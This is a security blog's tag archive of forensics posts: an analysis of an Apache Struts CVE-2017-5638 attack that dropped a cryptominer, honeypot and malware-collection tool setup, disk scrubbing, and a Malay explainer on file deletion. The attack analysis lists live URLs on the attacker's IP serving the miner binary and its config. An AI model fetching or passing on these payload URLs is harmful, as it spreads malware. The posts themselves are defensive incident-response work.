Tag Archives: forensic

Shell hiding in image files

One day, we noticed strange GET request towards our JBoss server:

From the request above, you’ll quickly noticed that this attack leveraging Apache Struts vulnerability from CVE-2017-5638.

The request tried to execute command below:

“-O” : writes the documents to file.
“-” : if is used as file, documents will be printed to standard output, disabling link conversion.
“-q” : quiet (no output)

As you see, it tried to fetch image (jpeg file) from 91.230.47.41. Seems normal right?
We fetch the file & take a look at the jpg file:

ASCII?? Not JPEG?? hmm..
Here’s whats inside the “logo.jpg” file:

We noticed there are several other file fetched; possibly a config file & bin file.
Let’s fetch those file!

Here is the config file:
http://91.230.47.41/pics/kworker.conf

Not sure it is. Maybe bin file to run a process:
http://91.230.47.41/pics/kworker

Lets see if the file is packed:

Yup. So lets unpacked the file using UPX:

http://91.230.47.41/pics/kworker_na

Overall, looks like the attacker want to hack our servers & turn it into his own crypto currency mining machine.
Typical behavior of attack we see in this time where the crypto currency is rising. People hack to make profit. πŸ™‚

Here the MD5 for file above:

Installing bulk_extractor on Mac OS X

All reference is taken at here: https://github.com/simsong/bulk_extractor/wiki/Installing-bulk_extractor

bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. The results can be easily inspected, parsed, or processed with automated tools.

To install bulk_extractor, first install required library via Macports:

All install dev library:

Download libewf source code:

Then install libewf from source (because libewf via ports too old):

Dionaea simple analysis

Dionaea exploit analysis

We’ll using python bundled with Dionaea:

It will open a python console. Enter the code below line by line:


It will produce test.bin file in /tmp/ folder.

Now we analyze it and dump the output to another file:

You should see something like this:

As you can see, the malicious URL is hxxp://188.245.32.210:8147/kcfl

https://sourceforge.net/p/nepenthes/mailman/message/26862416/

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLqery
  • CleanMX
  • .

    If you want to install maltrieve on your Mac OS X, below is the steps to install it.

    • First, install beautifulsoup4 via pip

    • Install required dependencies via apt-get

    • Download maltrieve from github

    Done. Now you can use the maltrieve on you Mac OS X.

    Script to install Thug honeypot on Ubuntu 12.04

    Thug is a Python low-interaction honeyclient aimed at mimicking the behaviour of a web browser in order to detect and emulate malicious contents. It based on Python + V8 JS engine. You can go to the website or google to understands more about this awesome application.

    So, here I share to you a script that automate the building and compiling Thug honeypot + V8 on Ubuntu machine:

    #!/bin/bash

    #Install some dependencies for the building process
    sudo apt-get install -y autoconf build-essential git-core scons subversion libboost-dev libboost-python-dev libboost-thread-dev libboost-system-dev libtool mongodb python-bs4 python-chardet python-cssutils python-dev python-html5lib python-httplib2 python-zope.interface python-pymongo python-pefile python-setuptools

    sudo easy_install beautifulsoup4

    #Obtaining libemu via Git
    cd /tmp/
    git clone git://git.carnivore.it/libemu.git

    #Configure and install
    cd /tmp/libemu/
    autoreconf -v -i
    ./configure –enable-python-bindings –prefix=/opt/libemu
    sudo make install
    sudo ldconfig -n /opt/libemu/lib

    #Obtaining pylibemu via Git
    cd /tmp/
    git clone https://github.com/buffer/pylibemu.git

    #Build and install
    cd /tmp/pylibemu/
    sudo sh -c “echo /opt/libemu/lib > /etc/ld.so.conf.d/pylibemu.conf”
    python setup.py build
    sudo python setup.py install

    #Obtain the codes via svn and git
    cd ~
    git clone https://github.com/buffer/thug.git
    cd ~/thug/
    svn checkout http://v8.googlecode.com/svn/trunk/ v8

    #Apply the Thug’s patch for V8
    cp patches/V8-patch* .
    patch -p0 < V8-patch1.diff
    rm V8-patch*

    #Build and compile python wrapper for V8. This process will compile the V8 engine at the same time
    cd /tmp/
    svn checkout http://pyv8.googlecode.com/svn/trunk/ pyv8
    export V8_HOME=$HOME/thug/v8
    cd pyv8
    python setup.py build
    sudo python setup.py install

    I really appreciate if you can share with me your experience using this software in production/real-life. πŸ™‚Β 

    Diskscrub – Erase your drive until unable to recover

    Diskcrub

    scrub overwrites hard disks, files, and other devices with repeating patterns intended to make recovering data from these devices more difficult. Although physical destruction is unarguably the most reliable method of destroying sensitive data, it is inconvenient and costly. For certain classes of data, organizations may be willing to do the next best thing which is scribble on all the bytes until retrieval would require heroic efforts in a lab.

    So, here I share with you the step to install & use this software.
    First, get latest diskscrub from code.google.com/p/diskscrub/downloads/list

    Then, extract the file using this command;

    Then, change the directory to the scrub folder;

    To use it, just type into the terminal;

    –> where sda2 is point to your drive that you want to erase.
    Carefull with your drive name!

    You can check you drive using command;
    Unix = diskutil list
    Linux = fdisk -l

    Delete file? Think again.

    Pernahkah anda terfikir kenapa apabila kita delete file dari komputer secara kekal, terdapat software2 yang masih boleh recover file2 tersebut? apakah yang akan terjadi apabila kita delete file permanently (shift+del) atau kita empty kan file tersebut dari recycle bin? Sebenarnya, apabila kita delete file (shift+del) atau empty recycle bin, file2 tersebut masih lagi ada dalam komputer kita, cuma system akan padamkan maklumat2 fizikal tetang lokasi file dan registry itu di dalam HDD kita.. maksudnya ia akan menandakan bahawa file tu sudah di-delete tapi sebenarnya belum lagi.. (maknanya kita search file tu sudah tiada, tapi sistem sudah buang address file tu yang bermakna kita secara virtual x nampak file tu tapi sebenarnya masih ada)

    kita sebenarnya x boleh delete file tersebut daripada Hard Disk kita, file2 tersebut akan di-delete semasa komputer kita hendak menggunakan free space dan akan menggantikan/overwrite dengan data yang baru (temp file, new file) dan data yang baru itu akan overwrite file2 yang secara fizikalnya belum di-delete di dalam HDD..

    cara terbaik untuk hapuskan file2 tersebut dari HDD ialah overwrite random data (ataupun dipanggil random byte) di block itu supaya x ada lagi file tersebut , apabila overwrite file tu dengan random data/byte, data asal file tersebut akan di-delete dan akan digantikan dengan random data di bahagian tersebut..tapi secara fizikalnya, kamu memang x boleh nk delete data tersebut dengan hanya shift+del atau empty recycle bin..

    dan itulah sebenarnya cara “software recovery” guna untuk cari kembali file2 yang sudah kita delete (delete secara virtual). Software itu akan mengimbas secara mendalam (deep scan) setiap block di dalam hard disk kita untuk mencari file2 yang sudah ditandakan oleh sistem sudah di-delete tapi sebenarnya belum lagi dan akan mengembalikan file2 yang sudah ditandakan delete itu kepada file asal..

    sebagai contoh kita ambik salah satu Operating System iaitu Windows, sebenarnya Windows akan cuba mengelakkan dari overwrite block yang mengandungi file2 yang belum di-delete itu untuk dalam usaha untuk membantu “recovery software” untuk recover2 file tersebut sampailah Windows terdesak untuk menggunakan free space dan akan overwrite data2 lama itu dengan data2 yang baru.. jadi peluang untuk kita recover file2 yang tersilap delete (delete secara x sengaja) itu akan bertambah? ya.. πŸ™‚ peluang untuk kita recover file2 itu masih ada jikalau file2 tersebut belum di-overwrite dengan data2 baru, jadi cara terbaik jika anda ter-delete file secara x sengaja, cepat2 lah recover file tu guna apa2 software2 yang boleh bantu kita untuk recover data tu sebelum di-overwrite dengan data2 baru.. dan jgn risau, banyak software2 yang freeware untuk kita gunakan dalam process recovery tersebut..

    bagaimana untuk overwrite data2 yang kita delete tu dengan random data/byte untuk halang recovery software dari recover file itu? terdapat banyak software untuk delete file tu secara permanent ataupun lebih dikenali sebagai “file shredder” atau “secure delete” program, salah satu software yng ramai orng tau ialah “Eraser” (open source software) atau “CCleaner” yang akan overwrite data2 lama dengan data2 random byte menggunakan cara2 tertentu.. dan jgn risau kerana ada banyak software yang free untuk kita gunakan dalam process untuk padamkan file tu selama-lamanya..

    Credit: akan diupdate semula bila dah jumpa owaner artikel.